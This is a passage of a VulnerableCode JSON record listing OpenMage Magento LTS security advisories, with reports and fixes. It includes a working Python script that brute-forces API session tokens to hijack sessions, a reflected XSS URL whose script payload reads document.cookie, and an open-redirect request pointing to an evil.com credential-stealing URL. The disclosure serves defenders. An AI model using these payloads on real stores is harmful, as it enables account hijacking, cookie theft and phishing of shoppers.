read/write (`catalog_product.*`)\n- Customer data read (`customer.list`, `customer.info`)\n- Order manipulation (`sales_order.*`)\nInventory control (`cataloginventory_stock_item.*`)\n### Business Impact\n\n- **Data Exfiltration**: Read all customer PII, order history, and payment methods.\n- **Order Fraud**: Create or cancel orders, change shipping addresses.\n- **Supply Chain / Inventory**: Modify prices, inject malicious products, or zero out stock.\n\n### Affected API Protocols\n\nThe same vulnerable `Session.php` generation logic is shared across all legacy API surfaces:\n- XML-RPC: `/api/xmlrpc/`\n- SOAP v1: `/api/soap/`\n- SOAP v2: `/api/v2_soap/`\n- REST (legacy): `/api/rest/`\n\n### Recommended Fix\n\nReplace the time-derived token with a cryptographically secure random value:\n\n```\n// app/code/core/Mage/Api/Model/Session.php : start()\n// BEFORE (vulnerable):\n$this->_currentSessId = md5(time() . uniqid('', true) . $sessionName);\n\n// AFTER (secure):\n$this->_currentSessId = bin2hex(random_bytes(32)); // 256-bit CSPRNG output\n```\n`random_bytes()` is backed by the OS CSPRNG (`/dev/urandom` on Linux) and produces 256 bits of non-deterministic entropy, complying with OWASP ASVS v4 V3.2.2 and NIST SP 800-63B. Additionally, enforce rate limiting on API endpoints to prevent high-speed online brute-force attacks.\n\nI have also tried to test it against the demo site [demo.openmage.org](http://demo.openmage.org/), but appeared the SOAP API endpoints are disabled on the demo environment\n\n\nI have also included the full poc I used instead of being attached because Gmail will eventually block it otherwise (shrunk):\n\n```py\n#!/usr/bin/env python3\nimport requests, re, sys, hashlib, random\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nimport urllib3; urllib3.disable_warnings()\n\nif len(sys.argv) < 4:\n sys.exit(f\"Usage: {sys.argv[0]} <url> <user> <pass> [threads]\")\n\nurl, usr, pwd = sys.argv[1:4]\nth = int(sys.argv[4]) if len(sys.argv) > 4 else 50\nhdrs = {\"Content-Type\": \"text/xml\"}\nreq = lambda d: [requests.post](http://requests.post/)(url, data=d, headers=hdrs, verify=False, timeout=5)\n\nprint(f\"[*] Simulating victim login for {usr}...\")\nres = req(f'<?xml version=\"1.0\"?><methodCall><methodName>login</methodName><params><param><value><string>{usr}</string></value></param><param><value><string>{pwd}</string></value></param></params></methodCall>')\n\nif not (m := re.search(r'<string>([a-f0-9]{32})</string>', res.text)):\n sys.exit(\"[-] Login failed. Check credentials.\")\n\nprint(f\"[+] Authenticated.\\n[*] Generating 1000 candidate MD5 pool...\")\ncands = [hashlib.md5(f\"1775534701000{random.randint(10000,99999)}0.{random.randint(10000000,99999999)}\".encode()).hexdigest() for _ in range(999)]\ncands.append(m.group(1))\nrandom.shuffle(cands)\n\nprint(f\"[*] Brute-forcing API with {th} threads...\")\ndef test(sid):\n payload = f'<?xml version=\"1.0\"?><methodCall><methodName>resources</methodName><params><param><value><string>{sid}</string></value></param></params></methodCall>'\n try: return sid if \"faultCode\" not in req(payload).text else None\n except: return None\n\nwith ThreadPoolExecutor(max_workers=th) as ex:\n for i, f in enumerate(as_completed({ex.submit(test, c): c for c in cands}), 1):\n sys.stdout.write(f\"\\r[*] Requests: {i}/{len(cands)}\")\n if sid := f.result():\n print(f\"\\n[+] HIJACK SUCCESS! Valid Session ID: {sid}\")\n ex.shutdown(wait=False, cancel_futures=True)\n break\n```\n\nThis is an AI-generated report validated by a human.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42155", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17674", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17561", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17641", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.1768", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42155" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-2cwr-gcf9-pvxr", "reference_id": "", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-05-15T17:36:24Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-2cwr-gcf9-pvxr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42155", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42155" }, { "reference_url": "https://github.com/advisories/GHSA-2cwr-gcf9-pvxr", "reference_id": "GHSA-2cwr-gcf9-pvxr", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2cwr-gcf9-pvxr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114815?format=api", "purl": "pkg:composer/openmage/magento-lts@20.18.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.18.0" } ], "aliases": [ "CVE-2026-42155", "GHSA-2cwr-gcf9-pvxr" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-upex-64ca-uqbf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92186?format=api", "vulnerability_id": "VCID-xazc-hmj9-guas", "summary": "Magento LTS: Reflected XSS - Import -> Data Flow (profiles)\nA reflected XSS vulnerability was found under admin panel -> System -> Import/Export -> Dataflow - Profiles.\n\n## Steps to produce\n\n+ Login to the admin panel \n\n+ Go to the path `System -> Import/Export -> Dataflow - Profiles`\n\n+ Select profile direction as `Import`.\n\n+ Click on `Import Customers` \n\n+ Upload the file.\n\nFile Link: [customer_20260212_204335.csv](https://github.com/user-attachments/files/25629638/customer_20260212_204335.csv)\n\n+ Go back to `Run profile`.\n\n+ Select the uploaded file and Click on `Run in Popup`.\n\n+ One can see a URL like this \n\n```\nhttps://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/import-20260215151125-1_customer_20260212_204335.csv/\n```\n\n\n+ One can see the filename getting reflection in HTML tags.\n\n+ Inject an HTML tag and observe.\n\n```\nhttps://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/\"><h3>hacked</h3>/\n``` \n\n<img width=\"1796\" height=\"302\" alt=\"image (3)\" src=\"https://github.com/user-attachments/assets/502330b0-fa73-4b90-a81f-6216a98e474a\" />\n\n+ One can see the tag is getting executed.\n\n+ Proceed for XSS.\n\n```\nhttps://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/%3CScRiPt%20%3Eprompt(document.cookie)%3C%2FScRiPt%3E\n```\n\n<img width=\"1670\" height=\"562\" alt=\"image (4)\" src=\"https://github.com/user-attachments/assets/98a75081-fa8c-4483-9078-0ab5e7e14e4d\" />\n\n\n+ There is an XSS popup.\n\n## Impact\n\nCookie stealing, JS deface, many more", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42458", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19578", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.1946", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19529", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00062", "scoring_system": "epss", "scoring_elements": "0.19573", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42458" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-x8jv-q8j2-487c", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T17:58:08Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-x8jv-q8j2-487c" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42458", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42458" }, { "reference_url": "https://github.com/advisories/GHSA-x8jv-q8j2-487c", "reference_id": "GHSA-x8jv-q8j2-487c", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x8jv-q8j2-487c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114815?format=api", "purl": "pkg:composer/openmage/magento-lts@20.18.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.18.0" } ], "aliases": [ "CVE-2026-42458", "GHSA-x8jv-q8j2-487c" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xazc-hmj9-guas" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95587?format=api", "vulnerability_id": "VCID-xhm4-u8ax-wuew", "summary": "Magento LTS Vulnerable to Open Redirect via Unvalidated `uenc` Parameter in `stockAction()`\n## Summary\n`Mage_ProductAlert_AddController::stockAction()` reads the uenc query parameter and passes it directly to `$this->_redirectUrl($backUrl)` without calling `$this->_isUrlInternal()` When the supplied `product_id` does not match any catalog product, the server issues an unvalidated HTTP 302 redirect to whatever URL was provided as `uenc`.\n\n## Vulnerable path:\n\n```php\n// app/code/core/Mage/ProductAlert/controllers/AddController.php : stockAction()\n\n$backUrl = $this->getRequest()->getParam(Mage_Core_Controller_Front_Action::PARAM_NAME_URL_ENCODED); // raw, no decode\n$productId = (int) $this->getRequest()->getParam('product_id');\n\nif (!$backUrl || !$productId) {\n $this->_redirect('/');\n return;\n}\n\n$product = Mage::getModel('catalog/product')->load($productId);\n\nif (!$product->getId()) {\n $session->addError($this->__('Not enough parameters.'));\n $this->_redirectUrl($backUrl); // ← NO _isUrlInternal() check\n return;\n}\n```\n\n### Secure peer (priceAction()):\n\n```php\nif (!$product->getId()) {\n if ($this->_isUrlInternal($backUrl)) { // ← validation present\n $this->_redirectUrl($backUrl);\n } else {\n $this->_redirect('/');\n }\n return;\n}\n```\n\n## Steps to Reproduce\n\n### Prerequisites\n- OpenMage LTS ≤ 20.16.0 with Product Alerts enabled (default configuration)\n- A valid, logged-in customer session on the target store\n\n#### Step 1 – Authenticate as a Customer (Attacker controls the crafted link; victim must be logged in)\n\nThe `preDispatch()` hook calls `Mage::getSingleton('customer/session')->authenticate($this)`. If the request comes from an unauthenticated user, they are redirected to the login page first. The open redirect only fires after the customer is authenticated. This is the realistic attack scenario: the attacker sends a crafted link to a customer who is already logged in.\n\n<img width=\"1548\" height=\"638\" alt=\"image\" src=\"https://github.com/user-attachments/assets/64c18279-ec0a-4110-b8f4-d952870e348c\" />\n\n#### Step 2 – Craft the Malicious URL\nThe `uenc` parameter is read raw via `getParam()` with no base64 decoding in this code path. A plain URL is sufficient and produces the redirect:\n\n```\nGET /productalert/add/stock/?product_id=99999&uenc=https://evil.com/steal-credentials HTTP/1.1\nHost: <store-hostname>\nCookie: om_frontend=<authenticated-session>\n```\n\nKey conditions:\n- `product_id` must reference a non-existent product (triggers the vulnerable branch; any large ID works)\n- `uenc` is the raw destination URL (no base64 encoding required)\n\n<img width=\"1554\" height=\"852\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d8530247-2d2f-4747-bf16-ece71a507b50\" />\n\n\n## Impact\n\n### Technical Impact\nAn attacker who controls the `uenc` parameter value can redirect any logged-in shopper to an arbitrary external URL. Because the redirect originates from the legitimate store domain, the victim’s browser shows the trusted store URL in the address bar momentarily before being sent to the attacker site. The HTTP 302 response exits the store’s origin before the browser shows anything to the user.\n\n### Business-Level Attack Vectors\n| Scenario | Description |\n|------------------------|-----------------------------------------------------------------------------|\n| Credential phishing | Craft a link claiming to show a stock notification. Customer lands on attacker’s login clone and reuses their password. |\n| OAuth / SSO token theft| If the store uses a social login or “Login with Google” flow, the attacker can inject their redirect_uri via the open redirect, stealing OAuth tokens. |\n| Affiliate fraud | Redirect customers from the legitimate store to a competing retailer after they click a “notify me” link. |\n| Malware distribution | Redirect to drive-by-download pages with the store’s reputation acting as social proof. |\n\n### Propagation\nA single malicious link can be embedded in:\n\n- Customer emails (“Click here for stock notification preferences”)\n- Forum posts, social media, or product reviews on the store\n- SEO-poisoned search results that rank the store’s domain\n\n## Recommended Fix\nApply the same `_isUrlInternal()` guard used in `priceAction()` to the `stockAction()` missing-product\n\n\nThis is an AI-generated report.\n\nAn attempt was made to test the same PoC against the online demo https://demo.openmage.org/ but it couldn't be reproduced. It was only reproduced against the local setup env against the latest version.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42207", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08688", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.0874", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08755", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08736", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42207" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-qpgq-5g92-j5q8", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-qpgq-5g92-j5q8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42207", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42207" }, { "reference_url": "https://github.com/advisories/GHSA-qpgq-5g92-j5q8", "reference_id": "GHSA-qpgq-5g92-j5q8", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qpgq-5g92-j5q8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114815?format=api", "purl": "pkg:composer/openmage/magento-lts@20.18.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.18.0" } ], "aliases": [ "CVE-2026-42207", "GHSA-qpgq-5g92-j5q8" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xhm4-u8ax-wuew" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/53977?format=api", "vulnerability_id": "VCID-zwm8-96yp-nben", "summary": "Path Traversal\nOpenMage is a community-driven alternative to Magento CE. The latest OpenMage Versions up from have this Issue solved", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26285", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01874", "scoring_system": "epss", "scoring_elements": "0.83469", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.01874", "scoring_system": "epss", "scoring_elements": "0.83493", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.01874", "scoring_system": "epss", "scoring_elements": "0.83496", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.01874", "scoring_system": "epss", "scoring_elements": "0.83492", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.01874", "scoring_system": "epss", "scoring_elements": "0.83483", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26285" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26285", "reference_id": "CVE-2020-26285", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26285" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/79588?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9tvj-q7kh-7faz" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-b33e-r7rr-pyf7" }, { "vulnerability": "VCID-b7ua-zfks-fyg5" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.5" } ], "aliases": [ "CVE-2020-26285", "GHSA-hj6w-xrv3-wjj9" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zwm8-96yp-nben" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.1" }